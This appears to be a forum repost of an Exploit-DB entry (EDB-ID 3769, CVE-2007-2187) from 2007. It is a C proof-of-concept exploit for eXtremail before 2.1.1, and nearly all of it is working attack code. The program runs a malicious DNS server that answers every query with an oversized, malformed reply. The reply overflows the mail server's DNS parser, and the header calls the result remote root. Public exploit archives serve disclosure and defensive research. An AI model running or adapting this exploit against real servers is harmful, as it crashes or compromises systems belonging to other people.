- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3769
- Проверка EDB
-
- Пройдено
- Автор
- MU-B
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2007-2187
- Дата публикации
- 2007-04-20
C:
/* extremail-v9.c
*
* Copyright (c) 2007 by <[email protected]>
*
* eXtremail <2.1.1 remote root POC (x86-lnx)
* by mu-b - Tue Feb 6 2007
*
* - Tested on: eXtremail 2.1.0 (lnx)
* eXtremail 2.1.1 (lnx)
*
* POC for DNS parsing bugs...
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#define DNS_HDR_LEN 12
#define DNS_TRAIL_LEN 20
#define DNS_PORT 53
#define DNS_MAX_MSG 0x200
#define HAMMER_LEN 284
static char * dns_hdr_buf =
"\x69\x69" /* transaction id */
"\x81\x80" /* flags */
"\x00\x01" /* questions */
"\x00\x01" /* answers rrs */
"\x00\x00" /* authority rrs */
"\x00\x00"; /* additional rrs */
static char * dns_trail_buf =
"\x00\x01" /* type */
"\x00\x01" /* class */
/* Answers */
"\xc0\x0c" /* name ptr */
"\x00\x01" /* type */
"\x00\x01" /* class */
"\x00\x01\x51\x80" /* ttl (1 day) */
"\x00\x04" /* data length */
"\xff\xff\xff\xff"; /* 255.255.255.255 */
int
main (int argc, char *argv[])
{
int sock, result;
struct sockaddr_in cliaddr, servaddr;
printf ("eXtremail 2.1.1 remote root POC\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
sock = socket (AF_INET, SOCK_DGRAM, 0);
if (sock < 0)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
servaddr.sin_port = htons (DNS_PORT);
result = bind (sock, (struct sockaddr *) &servaddr, sizeof servaddr);
if (result < 0)
{
perror ("bind()");
exit (EXIT_FAILURE);
}
printf ("+Waiting for data on port %d...\n", DNS_PORT);
while (1)
{
int n, clilen, curlen, len;
char rbuf[DNS_MAX_MSG], sbuf[DNS_MAX_MSG*4];
char *ptr;
memset (rbuf, 0, sizeof rbuf);
memset (sbuf, 0, sizeof sbuf);
/* receive message */
clilen = sizeof cliaddr;
n = recvfrom (sock, rbuf, DNS_MAX_MSG, 0, (struct sockaddr *) &cliaddr, &clilen);
if (n < 0)
{
printf ("- cannot receive data!\n");
continue;
}
/* print received message */
printf ("+ Connection from %s: %u\n",
inet_ntoa (cliaddr.sin_addr),
ntohs (cliaddr.sin_port));
/* formulate reply */
ptr = sbuf;
memcpy (ptr, dns_hdr_buf, DNS_HDR_LEN);
ptr += DNS_HDR_LEN;
for (len = 0; len < HAMMER_LEN; ptr += curlen)
{
if (len + 63 > HAMMER_LEN)
curlen = HAMMER_LEN - len;
else
curlen = 63;
len += curlen;
*ptr++ = curlen;
memset (ptr, 0x41, curlen);
}
*((unsigned long *)(ptr - 4)) = 0xdeadbeef;
*ptr++ = 0x00;
memcpy (ptr, dns_trail_buf, DNS_TRAIL_LEN);
ptr += DNS_TRAIL_LEN;
n = sendto (sock, sbuf, ptr-sbuf, 0, (struct sockaddr *) &cliaddr, clilen);
}
return (EXIT_SUCCESS);
}
// milw0rm.com [2007-04-20]
- Источник
- www.exploit-db.com